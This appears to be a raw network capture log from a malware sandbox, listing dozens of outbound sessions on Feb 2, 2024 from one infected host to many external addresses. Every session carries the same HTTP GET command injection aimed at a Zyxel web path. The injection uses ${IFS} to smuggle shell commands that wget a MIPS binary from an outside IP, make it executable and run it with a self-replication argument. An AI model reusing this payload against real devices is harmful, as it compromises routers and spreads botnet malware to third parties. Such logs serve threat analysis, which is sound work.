                                                        Feb 2, 2024 06:20:18.438527107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        137192.168.2.143678857.205.245.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.438625097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        138192.168.2.143876086.98.146.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.438693047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        139192.168.2.145121491.240.151.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.438751936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        140192.168.2.1442522170.160.200.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.438771963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        141192.168.2.14608542.198.146.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.438853979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        142192.168.2.1459576216.253.187.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.438863039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        143192.168.2.145187259.139.177.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.438913107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        144192.168.2.1433540153.222.132.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.438913107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        145192.168.2.1446612207.148.182.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.438965082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        146192.168.2.1447744175.158.56.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.438965082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        147192.168.2.1454350150.126.244.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.439006090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        148192.168.2.1451754165.18.137.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.439152002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        149192.168.2.1452358128.236.216.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.439202070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        150192.168.2.1459480109.0.236.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.439235926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        151192.168.2.144326813.201.156.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.439295053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        152192.168.2.1459046154.107.182.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.439312935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        153192.168.2.1433568156.62.237.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.439407110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        154192.168.2.1455004108.210.72.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.439444065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        155192.168.2.145246673.94.31.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.439522028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        156192.168.2.145703853.188.249.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.439567089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        157192.168.2.1459706107.39.77.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.439579010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        158192.168.2.145057035.217.231.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.439666033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        159192.168.2.145715641.127.98.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.439687967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        160192.168.2.144591279.32.31.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.439713001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        161192.168.2.1447468168.33.56.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.439814091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        162192.168.2.1437604144.157.219.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.439903975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        163192.168.2.1444864170.93.251.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.439955950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        164192.168.2.145007232.59.99.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.439955950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        165192.168.2.144027498.253.76.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440002918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        166192.168.2.1442546206.155.54.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440002918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        167192.168.2.1456564184.253.217.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440020084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        168192.168.2.1449052137.79.167.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440093994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        169192.168.2.1441320160.122.102.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440139055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        170192.168.2.145034414.56.206.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440181017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        171192.168.2.145628840.137.223.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440201998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        172192.168.2.144760859.229.165.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440238953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        173192.168.2.1448154152.71.107.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440274000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        174192.168.2.1441554157.180.63.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440325022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        175192.168.2.14469545.200.76.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440360069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        176192.168.2.1460552185.216.241.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440448046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        177192.168.2.1450394174.13.121.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440510988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        178192.168.2.1446938143.179.17.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440579891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        179192.168.2.1448644120.203.246.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440587997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        180192.168.2.145461075.208.101.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440665960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        181192.168.2.1444886194.203.254.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440748930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        182192.168.2.1452956160.4.100.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440793991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        183192.168.2.1434580193.194.27.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440821886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        184192.168.2.1448086169.99.33.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440877914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        185192.168.2.1449772180.91.54.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440922022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        186192.168.2.146015065.165.181.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440922022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        187192.168.2.143858499.191.13.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440922022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        188192.168.2.144853414.157.185.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.440954924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        189192.168.2.1439424168.211.210.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441066980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        190192.168.2.144845678.111.158.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441093922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        191192.168.2.1436490145.92.164.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441169977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        192192.168.2.1457380178.250.5.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441210032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        193192.168.2.14466568.6.137.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441210032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        194192.168.2.1456950125.247.79.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441224098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        195192.168.2.1444108195.205.67.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441251040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        196192.168.2.145403679.134.46.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441288948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        197192.168.2.1450836180.200.100.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441385984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        198192.168.2.1436842141.5.52.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441414118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        199192.168.2.145321635.162.123.17443
                                                        TimestampBytes transferredDirectionData
